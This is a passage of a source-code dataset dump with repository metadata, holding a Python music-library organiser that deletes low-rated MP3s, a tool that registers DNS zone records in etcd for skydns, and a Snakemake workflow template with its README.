"text": "__author__ = 'Martin'\n\nfrom functions import *\nfrom config import *\nfrom mutagen.mp3 import MP3\n\nimport mutagen.mp3\nimport os\n\n# constant definitions\nID3_PLAYERPRO_RATING_TAG = \"POPM:PlayerPro Android\"\n\nfiles = os.listdir(MUSIC_QUANTUM_DIR)\nfiles_to_delete = []\n\n\n# deleting files with rating 1* (51 out of 255)\nfor file in files:\n tag_infos = MP3(MUSIC_QUANTUM_DIR + \"\\\\\" + file)\n\n if ID3_PLAYERPRO_RATING_TAG in tag_infos:\n if tag_infos[ID3_PLAYERPRO_RATING_TAG].rating == 51:\n files_to_delete.append(file)\n\nprint \"Found \" + str(len(files_to_delete)) + \" files with 1* rating\"\n\nvar = raw_input(\"Delete them? (y/n)\")\n\n\nif var == \"y\":\n for file in files_to_delete:\n file_to_delete = MUSIC_QUANTUM_DIR + \"\\\\\" + file\n os.unlink(file_to_delete)\n\n print \"Deleted the files\"\n"
},
{
"alpha_fraction": 0.6450116038322449,
"alphanum_fraction": 0.6484918594360352,
"avg_line_length": 24.235294342041016,
"blob_id": "a9befd428cb809e048d8c1cd4ba19838c38bb395",
"content_id": "dc47d3e1f962e4aaa26d630d54af4fcacd68bedc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 862,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 34,
"path": "/functions.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "__author__ = 'Martin'\n\nimport os\nimport colorama\n\ncolorama.init()\n\ndef ensure_dir(f):\n \"\"\"\n create folder structure, if not exits\n \"\"\"\n d = os.path.dirname(f)\n if not os.path.exists(f):\n print \"shoud make dir\"\n os.makedirs(f)\n\nclass style:\n def h1(self):\n return colorama.Back.GREEN + colorama.Fore.BLACK + colorama.Style.DIM\n\n def h2(self):\n return colorama.Back.BLUE + colorama.Fore.WHITE + colorama.Style.DIM\n\n def h3(self):\n return colorama.Back.GRAY + colorama.Fore.BLACK + colorama.Style.DIM\n\n def error(self):\n return colorama.Back.RED + colorama.Fore.WHITE + colorama.Style.DIM\n\n def info(self):\n return colorama.Back.BLACK + colorama.Fore.WHITE + colorama.Style.DIM\n\n def normal(self):\n return colorama.Back.BLACK + colorama.Fore.WHITE + colorama.Style.BRIGHT\n\n\n\n\n"
},
{
"alpha_fraction": 0.642578125,
"alphanum_fraction": 0.646484375,
"avg_line_length": 30.26530647277832,
"blob_id": "a40aa8167ebd08de9311a118862455b1a983369e",
"content_id": "047baf1a5ceebfabbb5843210e6d41cffaca39da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1536,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 49,
"path": "/main.py",
"repo_name": "Velinsky/Music-Library-Builder",
"src_encoding": "UTF-8",
"text": "from os import *\nfrom functions import *\nfrom config import *\n\nimport re\nimport sys\n\n\n\n# number of songs to move to quantum folder, if it is empty\nQUANTUM_SIZE = 100\n\n# application initialization\n\n# print style().h1() + ' === Otaguj si svoji hudbu === ' + style().normal()\n\n\n# make sure all necessary directories exists\nensure_dirs = [MUSIC_OUTBOX_DIR, MUSIC_QUANTUM_DIR]\n\nfor single_dir in ensure_dirs:\n if not os.path.exists(single_dir):\n ensure_dir(single_dir)\n print style().info() + 'folder ' + single_dir + ' does not exists, creating' + style().normal()\n\n# check whether any files are in quantum dir\nif not os.listdir(MUSIC_QUANTUM_DIR):\n print\n print style().h2() + 'QUANTUM is empty, filling it with files' + style().normal()\n\n # list all files in inbox\n quantum_files = []\n for root, dirs, files in os.walk(MUSIC_INBOX_DIR):\n for file in files:\n if re.search(\".mp3|.wma\", file):\n quantum_files.append(root + \"\\\\\" + file)\n\n # take quantum from inbox\n quantum_files = quantum_files[:QUANTUM_SIZE]\n print 'Taking ' + str(len(quantum_files)) + ' files from inbox'\n\n for quantum_file in quantum_files:\n os.rename(quantum_file, MUSIC_QUANTUM_DIR + \"\\\\\" + os.path.basename(quantum_file))\n sys.stdout.write('.')\n\n print style().normal()\n print style().normal() + 'Files moved from inbox to quantum'\nelse:\n print style().normal() + 'There are files on quantum (' + str(len(os.listdir(MUSIC_QUANTUM_DIR))) + '), thus doing nothing'\n\n\n\n\n"
}
] | 4 |
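A minimal sketch of the ID3 rating read that quantum-progress-reader.py performs; the file path is hypothetical, and the POPM key must match whichever player wrote the rating (here PlayerPro, as in the repo):

```python
from mutagen.mp3 import MP3

# Tags are exposed dict-style on the MP3 object; POPM frames carry a 0-255 rating.
tags = MP3("song.mp3")
key = "POPM:PlayerPro Android"
if key in tags:
    print(tags[key].rating)  # 51 is the 1-star value the script deletes on
```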
Putter173/NEC_SingleCycle
|
https://github.com/Putter173/NEC_SingleCycle
|
afdff88fb4181206fd405be5d15069da4563436b
|
cd7211b4fbf28431aea9797c9a2920bfc2fb4a69
|
801647de935c2ba1e7626d5b2c7798a383a6bf3e
|
refs/heads/main
| 2023-06-29T12:23:36.107535 | 2021-08-02T20:18:58 | 2021-08-02T20:18:58 | 380,172,922 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.403950959444046,
"alphanum_fraction": 0.4339236915111542,
"avg_line_length": 29.58333396911621,
"blob_id": "9c0124f60a3d63f344c5fb664441e3a998fe7c14",
"content_id": "61702d3b23508c20dbfaa1298ea7eefbdc0689af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1468,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 48,
"path": "/EME&EM_AgainstMass_NMC-Only.py",
"repo_name": "Putter173/NEC_SingleCycle",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport csv\n\nx = []\ny0 = []\ny1 = []\n\nwith open('data.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n if row[2] == \"NMC\":\n no = row[0]\n energy = row[18]\n if energy == \"\":\n energy = 0\n else:\n energy = row[18]\n mass = row[13]\n energy = float(energy)\n mass = float(mass)\n eme = round(energy / mass, 2)\n anode = row[6]\n if anode == \"Al\":\n anode = 0.0106\n elif anode == \"Cu\":\n anode = 0.0175\n else:\n raise ValueError('Unindentified Value for Anode Foil Material on row: ' + line_count)\n active = round(mass - 0.0106 - anode, 4)\n em = round(energy / active, 4)\n x.append(mass)\n y0.append(eme)\n y1.append(em)\n line_count += 1\n else:\n line_count += 1\n\nplt.scatter(x, y0, color= \"red\", marker= \".\", label = \"EME\", s=30)\nplt.scatter(x, y1, color= \"blue\", marker= \".\", label = \"EM\", s=30)\nplt.xlabel('Mass')\nplt.ylabel('EME & EM')\nplt.title('EME, EM & Mass - @ Cycle 5 (NMC ONLY)')\nplt.legend()\nplt.show() "
},
{
"alpha_fraction": 0.4488491117954254,
"alphanum_fraction": 0.4693094491958618,
"avg_line_length": 23.4375,
"blob_id": "991d8008b47a04260ac2992c3e84de79c54ce0ad",
"content_id": "f09ae5b5554f90d02af94cbd699d9e0010ffcd6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 32,
"path": "/EME_Against_FirstCycle.py",
"repo_name": "Putter173/NEC_SingleCycle",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport csv\n\nx = []\ny = []\n\nwith open('data.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n no = row[0]\n energy = row[14]\n if energy == \"\":\n energy = 0\n else:\n energy = row[14]\n mass = row[13]\n energy = float(energy)\n mass = float(mass)\n eme = round(energy / mass, 2)\n x.append(no)\n y.append(eme)\n line_count += 1 \n\nplt.scatter(x, y, color= \"red\", marker= \".\", s=30)\nplt.xlabel('Cell No.')\nplt.ylabel('EME')\nplt.title('EME & Cell - @ Cycle 1')\nplt.show() "
},
{
"alpha_fraction": 0.3735056519508362,
"alphanum_fraction": 0.41324716806411743,
"avg_line_length": 34.574710845947266,
"blob_id": "34dc9948999f49f153a56601eff1398fe0550744",
"content_id": "97ac4973cd7d4afec3b110a2191ee3ca490b91a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3105,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 87,
"path": "/EME_AgainstMassByThickness_NMC-Only.py",
"repo_name": "Putter173/NEC_SingleCycle",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport csv\n\nx0 = []\nx1 = []\nx2 = []\nx3 = []\ny0 = []\ny01 = []\ny1 = []\ny11 = []\ny2 = []\ny21 = []\ny3 = []\ny31 = []\n\n\nwith open('Data.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n if row[2] == \"NMC\": #Filter for NMC Cells Only\n no = row[0]\n energy = row[18]\n if energy == \"\": #NaN Energy Data Fallback\n energy = 0\n else:\n energy = row[18]\n mass = row[13]\n energy = float(energy)\n mass = float(mass)\n eme = round(energy / mass, 2)\n anode = row[6]\n if anode == \"Al\":\n anode = 0.0106\n elif anode == \"Cu\":\n anode = 0.0175\n else:\n raise ValueError('Unindentified Value for Anode Foil Material on row: ' + line_count)\n active = round(mass - 0.0106 - anode, 4)\n em = round(energy / active, 4)\n if eme <= 10 and em <= 10 : #Energy Threshold\n line_count += 1\n else:\n if float(row[5]) == 50: #Filter for 50μm\n if row[7] == 'CuBFO':\n y2.append(eme)\n y21.append(em)\n x2.append(active)\n line_count += 1\n else:\n y0.append(eme)\n y01.append(em)\n x0.append(active)\n line_count += 1\n elif float(row[5]) == 25: #Filter for 25μm\n if row[7] == 'CuBFO':\n y3.append(eme)\n y31.append(em)\n x3.append(active)\n line_count += 1\n else:\n y1.append(eme)\n y11.append(em)\n x1.append(active)\n line_count += 1\n else:\n line_count += 1\n else:\n line_count += 1\n\nplt.scatter(x0, y0, color= \"red\", marker= \".\", label = \"50μm EME\")\nplt.scatter(x0, y01, color= \"red\", marker= \"x\", label = \"50μm EM\")\nplt.scatter(x1, y1, color= \"blue\", marker= \".\", label = \"25μm EME\")\nplt.scatter(x1, y11, color= \"blue\", marker= \"x\", label = \"25μm EM\")\nplt.scatter(x2, y2, color= \"orange\", marker= \".\", label = \"50μm CuBFO EME\")\nplt.scatter(x2, y21, color= \"orange\", marker= \"x\", label = \"50μm CuBFO EM\")\nplt.scatter(x3, y3, color= \"green\", marker= \".\", label = \"25μm CuBFO EME\")\nplt.scatter(x3, y31, color= \"green\", marker= \"x\", label = \"25μm CuBFO EM\")\nplt.xlabel('Active Material Mass')\nplt.ylabel('EM & EME')\nplt.title('EM, EME & Mass - @ Cycle 5 (NMC ONLY)')\nplt.legend()\nplt.show() "
}
] | 3 |
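The arithmetic shared by the three scripts above, pulled out as one function for clarity; the foil masses (0.0106 g cathode foil, Al 0.0106 / Cu 0.0175 g anode foil) follow the constants hard-coded in the repo, and the sample numbers are invented:

```python
# EME = energy per total cell mass; EM = energy per active-material mass.
def eme_and_em(energy, mass, anode_foil="Al"):
    anode = 0.0106 if anode_foil == "Al" else 0.0175
    active = round(mass - 0.0106 - anode, 4)  # subtract both foil masses
    return round(energy / mass, 2), round(energy / active, 4)

print(eme_and_em(1.25, 0.45, "Cu"))
```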
roobre/skydns-register
|
https://github.com/roobre/skydns-register
|
d0123a2ccd79ac1112b58ad6882c18bf3677b9e2
|
f6456d98921fe77b77cf7e736bd9c6c1792b3bc4
|
b2f6ff17c8d1d40ba8715ed810e043fb3ce33c4f
|
refs/heads/master
| 2023-01-31T11:46:20.602166 | 2020-12-14T20:47:48 | 2020-12-14T20:47:48 | 320,072,305 | 0 | 1 | null | 2020-12-09T20:31:53 | 2020-12-13T19:55:17 | 2020-12-14T20:47:49 |
Python
|
[
{
"alpha_fraction": 0.6442845463752747,
"alphanum_fraction": 0.6482813954353333,
"avg_line_length": 36.90909194946289,
"blob_id": "0d1c27a4b76308051c86509a4a2da9d34643b7dc",
"content_id": "b9006d8e05745b55f4834b2c02a647e63f12d51c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2502,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 66,
"path": "/register.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport logging\nimport os\nimport time\nimport argparse\nimport zonewalker\nimport recordparser\nimport etcdclient\n\n\ndef main():\n parser = argparse.ArgumentParser()\n argparse_add_environ(parser, '--zonedir', type=str, help='Directory to look for zones into')\n argparse_add_environ(parser, '--dry-run', action='store_true', default=False, help='Do not write anything to etcd')\n argparse_add_environ(parser, '--verbose', action='store_true', default=False, help='Roar out louder!')\n argparse_add_environ(parser, '--etcd-host', type=str, default='localhost', help='etcd host')\n argparse_add_environ(parser, '--etcd-port', type=int, default=2379, help='etcd port')\n argparse_add_environ(parser, '--etcd-prefix', type=str, default='external-dns', help='Prefix for etcd record keys')\n argparse_add_environ(parser, '--etcd-suffix', type=str, default='skyreg', help='Suffix for etcd record keys')\n argparse_add_environ(parser, '--loop-every', type=int, default=0, help='Loop every n seconds. Set to 0 to run once')\n argparse_add_environ(parser, '--owner-id', type=str, default='skyreg', help='ID of the owner in case more than one skydns-register is running')\n args, extra = parser.parse_known_args()\n\n if args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n while True:\n zw = zonewalker.Zonewalker()\n\n if args.zonedir:\n zw.load_dir(args.zonedir)\n\n for zonefile in extra:\n zw.load_file(zonefile)\n\n rp = recordparser.RecordParser(prefix=args.etcd_prefix, suffix=args.etcd_suffix)\n for z in zw.zones():\n rp.parse_zone(z)\n\n try:\n etcd = etcdclient.EtcdClient(args.etcd_host, int(args.etcd_port), args.dry_run, args.owner_id)\n except Exception as e:\n logging.error(f\"could not connect to etcd at {args.etcd_host}:{args.etcd_port}: {str(e)}\")\n exit(2)\n return\n\n try:\n etcd.update(rp.skydns_entries())\n except Exception as e:\n logging.error(f\"error updating etcd: {str(e)}\")\n exit(3)\n\n if args.loop_every == 0:\n break\n\n time.sleep(args.loop_every)\n\n\ndef argparse_add_environ(parser: argparse.ArgumentParser, name: str, default=None, **other):\n envdefault = os.environ.get(name.strip('-').upper().replace('-', '_'))\n parser.add_argument(name, default=(envdefault if envdefault else default), **other)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5432742238044739,
"alphanum_fraction": 0.54535973072052,
"avg_line_length": 34.51852035522461,
"blob_id": "18213e67d1590790cba374e9d5b46bf195df45e7",
"content_id": "c71a832a1d44e95bd927e85dc9bfc8fe44eec1be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 27,
"path": "/etcdclient.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "import etcd3\nimport logging\nimport json\n\n\nclass EtcdClient:\n def __init__(self, host: str, port: int, dry_run: bool = False, owner_id: str = 'skyreg'):\n self._owner_id = owner_id\n self._dry_run = dry_run\n self._etcd = etcd3.client(host, port)\n if not self._dry_run:\n self._etcd.get('/')\n\n def update(self, records: dict):\n for val, meta in self._etcd.get_all():\n val = json.loads(val)\n if 'managed-by' in val and val['managed-by'] == self._owner_id and meta.key.decode() not in records:\n logging.info(f\"Deleting {meta.key.decode()}\")\n if not self._dry_run:\n self._etcd.delete(meta.key)\n\n for path in records:\n record = records[path]\n record['managed-by'] = self._owner_id\n logging.info(f\"Putting {path}\")\n if not self._dry_run:\n self._etcd.put(path, json.dumps(record))\n"
},
{
"alpha_fraction": 0.5128950476646423,
"alphanum_fraction": 0.513984739780426,
"avg_line_length": 30.284090042114258,
"blob_id": "d696e26bebb6cc6ac2f412970843c26bca53b67d",
"content_id": "fc74f710ca55cd90ba5efcd80f1dcb214d32a4de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2753,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 88,
"path": "/recordparser.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom typing import Dict\n\n\nclass RecordParser:\n def __init__(self, prefix: str = 'external-dns', suffix: str = 'skyreg'):\n self._records: Dict[Record] = {}\n self._prefix = prefix\n self._suffix = suffix\n\n def parse_zone(self, zone: dict):\n zonename = zone['zone']\n for rname in zone['records']:\n record = zone['records'][rname]\n\n if rname == '*':\n logging.warning(f\"Wilcard name ('*') is not supported in skydns, skipping\")\n continue\n\n key = self._dots_to_slashes(f\"{rname}.{zonename}\")\n self._records[key] = Record(rname, record)\n\n def skydns_entries(self) -> dict:\n skyentries = {}\n for key in self._records:\n record = self._records[key]\n try:\n skyrecord = record.skydns()\n skyrecord['targetstrip'] = 1\n skyentries[key] = skyrecord\n except Exception as e:\n logging.error(f\"error converting record '{key}', skipping: {str(e)}\")\n\n return skyentries\n\n def _dots_to_slashes(self, dotname: str) -> str:\n pieces = [ self._suffix ]\n\n pieces += dotname.strip('.').split('.')\n\n pieces.append(self._prefix)\n pieces += [ '' ]\n pieces.reverse()\n return '/'.join(pieces)\n\n\nclass Record:\n def __init__(self, name: str, entries: [dict, list]):\n if type(entries) != list:\n entries = [entries]\n\n self._entries = entries\n self._name = name\n\n \"\"\"\n Convert record to skydns format\n \"\"\"\n\n def skydns(self) -> dict:\n record = {}\n\n for entry in self._entries:\n if 'type' not in entry:\n logging.warning(f\"missing attribute 'type' for value in {self._name}, skipping\")\n continue\n\n if entry['type'] == 'MX':\n record['mail'] = True\n continue\n\n if 'value' not in entry:\n if 'values' in entry and type(entry['values']) == list and len(entry['values']) > 0:\n logging.info(f\"Using first entry of 'values' as value for '{self._name}'\")\n entry['value'] = entry['values'][0]\n else:\n logging.warning(f\"entry {self._name} lacks both 'value' and 'values[]', skipping\")\n continue\n\n if entry['type'] in ['A', 'AAAA', 'CNAME']:\n record['host'] = entry['value']\n elif entry['type'] == 'TXT':\n record['text'] = entry['value']\n\n if 'mail' in record and 'host' not in record:\n raise Exception(\"Record has MX type but not an address associated to it\")\n\n return record\n"
},
{
"alpha_fraction": 0.5785824060440063,
"alphanum_fraction": 0.579352855682373,
"avg_line_length": 28.5,
"blob_id": "5e5dce4d1be5629f424dd1442975de0d80ef835c",
"content_id": "c5c49b8d67491c6aa928095dc2c944c081d024e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1298,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 44,
"path": "/zonewalker.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "import yaml\nimport logging\nimport os\n\n\nclass Zonewalker:\n def __init__(self):\n self._zones = []\n\n def load_dir(self, path: str):\n for zonefile in os.scandir(path):\n if zonefile.is_file() and (zonefile.path.endswith('.yaml') or zonefile.path.endswith('.yml')):\n self.load_file(os.path.join(path, zonefile.name))\n\n def load_file(self, yaml_path: str):\n try:\n zone = self._yaml_load(yaml_path)\n except Exception as e:\n logging.warning(f\"skipping zone from {yaml_path}: {str(e)}\")\n return\n\n self._zones.append(zone)\n\n def zones(self) -> list:\n return self._zones\n\n @staticmethod\n def _yaml_load(filepath: str):\n file = open(filepath, mode='r')\n contents = yaml.safe_load(file)\n file.close()\n\n Zonewalker._validate(contents)\n\n return contents\n\n @staticmethod\n def _validate(zone: dict):\n if type(zone) != dict:\n raise Exception(\"zone is not a dict\")\n if 'zone' not in zone or type(zone['zone']) != str:\n raise Exception(\"zone.zone must exist and be a string\")\n if 'records' not in zone or type(zone['records']) != dict or len(zone['records']) <= 0:\n raise Exception(\"invalid record list\")\n"
},
{
"alpha_fraction": 0.734375,
"alphanum_fraction": 0.734375,
"avg_line_length": 17.285715103149414,
"blob_id": "f13039c30ecc5792ace9ee7ddab50299ddd0aece",
"content_id": "c500bd3e8149ba95f186487d458856e0f82aeb7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 7,
"path": "/Dockerfile",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "FROM python:slim\n\nRUN mkdir /app\nWORKDIR /app\nCOPY . /app\nRUN pip install -r requirements.txt\nENTRYPOINT [ \"/app/register.py\" ]\n"
}
] | 5 |
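A standalone re-statement of `RecordParser._dots_to_slashes` from the file above, to show the etcd key layout it produces (reversed DNS labels under the prefix, with the owner suffix last):

```python
def dots_to_slashes(dotname, prefix="external-dns", suffix="skyreg"):
    # suffix first, then the labels, then prefix and a leading empty piece;
    # reversing yields /prefix/tld/.../host/suffix
    pieces = [suffix] + dotname.strip(".").split(".") + [prefix, ""]
    pieces.reverse()
    return "/".join(pieces)

print(dots_to_slashes("www.example.com"))
# /external-dns/com/example/www/skyreg
```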
sagc-bioinformatics/snakemake_basic_template
|
https://github.com/sagc-bioinformatics/snakemake_basic_template
|
bc3ed9f8c19b56c4569794a4c4eb7ee1c0925958
|
7daea673755e9a176b9c2dceea12ae7477153c81
|
2091c4e00164f99e08a103b3f2ef84e49fd8b6ae
|
refs/heads/main
| 2023-07-08T18:31:13.785668 | 2021-08-18T04:34:08 | 2021-08-18T04:34:08 | 397,461,568 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7399328947067261,
"alphanum_fraction": 0.744966447353363,
"avg_line_length": 23.83333396911621,
"blob_id": "862255132e38a6531592a45a8f0844d1effc55a6",
"content_id": "4d721a3dff822a4416ef988bf45dbb0021fce8cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 48,
"path": "/README.md",
"repo_name": "sagc-bioinformatics/snakemake_basic_template",
"src_encoding": "UTF-8",
"text": "This repository is intended to be used as a Snakemake workflow template.\nIt provides all the necessary files and inline documentation to assist with generating your own customise workflow.\n\n# Running the Workflow\n\nTo run a Snakemake workflow, you will first need to have gone through the [Snakemake One-Time Setup] to install Snakemake in a conda environment.\n\n```bash\nSNAKEMAKE_VERSION='6.7.0'\n\n# Activate the conda environment to make Snakemake\n# available to you on the command line\nconda activate \\\n \"snakemake_${SNAKEMAKE_VERSION}\"\n\n# Run the workflow using the sahmri-hpc profile\n# in order to have jobs submitted to Slurm\nsnakemake \\\n --profile profiles/sahmri-hpc\n```\n\n# Snakemake One-Time Setup\n\n```bash\nSNAKEMAKE_VERSION='6.7.0'\n\n# Create an empty environment\nconda create \\\n --yes \\\n --name \"snakemake_v${SNAKEMAKE_VERSION}\"\n\n# Activate the new, empty environment\nconda activate \\\n \"snakemake_v${SNAKEMAKE_VERSION}\"\n\n# Install mamba - a faster/better version of the conda executable\nconda install \\\n --yes \\\n --channel conda-forge \\\n mamba\n\n# Install Snakemake\nmamba install \\\n --yes \\\n --channel bioconda \\\n --channel conda-forge \\\n snakemake=${SNAKEMAKE_VERSION}\n```\n"
},
{
"alpha_fraction": 0.6774193644523621,
"alphanum_fraction": 0.6774193644523621,
"avg_line_length": 30,
"blob_id": "64cfa2c717d5879c794cd4724fbd813eb3cff1c6",
"content_id": "51eaa00446992f9d6cf0a178c122081e069d61f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/rules/misc.smk",
"repo_name": "sagc-bioinformatics/snakemake_basic_template",
"src_encoding": "UTF-8",
"text": "# No rules defined here...yet?\n"
},
{
"alpha_fraction": 0.7149046659469604,
"alphanum_fraction": 0.7215482592582703,
"avg_line_length": 34.69072341918945,
"blob_id": "f334d58f121a09b65fdf06f287c84395af229e5c",
"content_id": "8469a65f0bce28d3f7db5113517326d279437e2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3462,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 97,
"path": "/Snakefile",
"repo_name": "sagc-bioinformatics/snakemake_basic_template",
"src_encoding": "UTF-8",
"text": "# General Snakemake top-matter\n\n# Snakemake can run a rule multiple times in order to collect benchmark information.\n# Set number of benchmarks to run to 1 - we can now use this variable in our rules.\nN_BENCHMARKS = 1\n\n# Jobs can be run inside a singularity container when using --use-singularity.\n# Specifying a container at the top-level provides the same image to all jobs.\nsingularity:\n\t\"docker://continuumio/miniconda3:4.10.3p0\"\n\n# Include other rules from other Snakefiles.\ninclude:\n\t\"rules/misc.smk\",\n\n# While rules should be run locally (e.g. head node) rather than being submitted as jobs.\nlocalrules:\n\tall,\n\n# Pseudorules to define convienient groups of target files.\n# By convention, the first should be called \"all\" as it will gets this alias anyway.\n# Simply specify all the required target files as the input to the pseudorule.\n# Use expand() as a convienient way to create all combinations of filenames.\nrule all:\n\tinput:\n\t\t# Explicitly defining EVERY target file quickly becomes a pain!\n\t\t'test/output/demo_minimal',\n\t\t# Use expand() as a convienient way to define many files with less reduncancy.\n\t\t# By default, expand() generates all combinations (products) of filenames if there is more than 1 replacement variable\n\t\texpand(\n\t\t\t'test/output/demo_{suffix}',\n\t\t\tsuffix = [\n\t\t\t\t'realistic',\n\t\t\t\t'wildcards',\n\t\t\t],\n\t\t),\n\n# Rules define, at a minimum, both input and output files and a way to make the output from the input.\n# Here we use the \"shell\" directive, but you could use \"run\" (Python code), \"script\" (external Python, R, Rmd, Julia and Rust), \"notebook\" for Jupyter notebook.\nrule demo_minimal:\n\tinput:\n\t\t'test/input/demo.in',\n\toutput:\n\t\t'test/output/demo_minimal',\n\tshell:\n\t\t\"\"\"\n\t\tsed -e '1~2d' < {input} > {output}\n\t\t\"\"\"\n\n# A more realistic example will specify a few more directives:\n# conda - A conda environment file detailing the tools required for this rule to run\n# resources - The job resources to request from Slurm. Supports \"mem_gb\", \"time_hr\" and \"threads\". They must be integer values.\n# threads - Number of threads available to the rule. 
This should match what is specified in the resources directive.\n# benchmark - Where to save benchmark stats and how many benchmarks to run\nrule demo_realistic:\n\tinput:\n\t\t'test/input/demo.in',\n\toutput:\n\t\t'test/output/demo_realistic',\n\tconda:\n\t\t'envs/demo.yaml',\n\tresources:\n\t\tmem_gb = 4,\n\t\ttime_hr = 8,\n\t\tthreads = 2,\n\tthreads:\n\t\t2,\n\tbenchmark:\n\t\trepeat(\"test/benchmarks/demo_realistic.txt\", N_BENCHMARKS),\n\tshell:\n\t\t\"\"\"\n\t\tsed -e '1~3d' < {input} > {output}\n\t\t\"\"\"\n# Rather than having a rule defined for EVERY possible output file, generalise the rules using wildcards.\n# Snakemake identifies the rule (or chain of rules) capable of making the requested file(s) by matching the filepath to the output directives of rules.\n# Exact matches take precedence and then wildcard (think regular expression) matches.\n# Wildcard values are defined via matching the output file(s) and \"reused\" in constructing identifying the input file(s).\n# All outout directives (output, log and benchmark) must specify ALL the same wildcards.\nrule demo_wildcards:\n\tinput:\n\t\t'test/input/{a_wildcard}.in',\n\toutput:\n\t\t'test/output/{a_wildcard}_wildcards',\n\tconda:\n\t\t'envs/demo.yaml',\n\tresources:\n\t\tmem_gb = 1,\n\t\ttime_hr = 1,\n\t\tthreads = 1,\n\tthreads:\n\t\t1,\n\tbenchmark:\n\t\trepeat(\"test/benchmarks/{a_wildcard}_wildcards.txt\", N_BENCHMARKS),\n\tshell:\n\t\t\"\"\"\n\t\tsed -e '1~4d' < {input} > {output}\n\t\t\"\"\"\n"
}
] | 3 |
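What the Snakefile's `expand()` call in `rule all` evaluates to, sketched with plain Python (Snakemake's `expand` behaves the same for this single-variable case):

```python
# Equivalent of expand('test/output/demo_{suffix}', suffix=[...]).
targets = ["test/output/demo_{}".format(s) for s in ["realistic", "wildcards"]]
print(targets)  # ['test/output/demo_realistic', 'test/output/demo_wildcards']
```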
fengqing-dong/codes
|
https://github.com/fengqing-dong/codes
|
6870827ae4ded3dc9cd0ee8a9d563ed8fb74177f
|
234e4ea3b176b97cb9a231fff25bb579e3074b48
|
7efef4a193dc18e4581e089f7501527937ae5056
|
refs/heads/master
| 2020-05-02T14:15:28.038655 | 2019-04-24T10:48:51 | 2019-04-24T10:48:51 | 178,005,274 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5490764379501343,
"alphanum_fraction": 0.5566823482513428,
"avg_line_length": 27.17346954345703,
"blob_id": "0035f4bbbae76f5e5aa784bdf4fd814350e994f4",
"content_id": "2226ea1f4bad75b56431cd4b35c53658af1e0a8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2805,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 98,
"path": "/python_codes/for_ngs.py",
"repo_name": "fengqing-dong/codes",
"src_encoding": "UTF-8",
